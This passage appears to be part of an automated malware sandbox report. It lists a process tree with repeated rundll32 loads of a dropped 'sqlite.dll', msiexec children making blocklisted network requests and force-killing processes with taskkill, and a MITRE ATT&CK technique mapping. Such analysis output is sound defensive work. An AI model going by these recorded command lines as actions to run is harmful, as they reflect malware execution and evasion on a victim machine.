  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5284

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:4572

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5264
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6416

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6528

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4208

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6256
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B0B05F1AA3EEA58001ECE113FA3427B5 C
  2⤵
  - Loads dropped DLL
  PID:6976
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 29ECF95C2555802E18F3C0D5F82AEE0C
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:4876
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:4068
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E338106C6173E48F75946D76F9F0CB2F E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:6380

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6616
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:4416

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6376

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4920

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5488

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2536

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:2836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:732

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3280

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4904

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6276

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery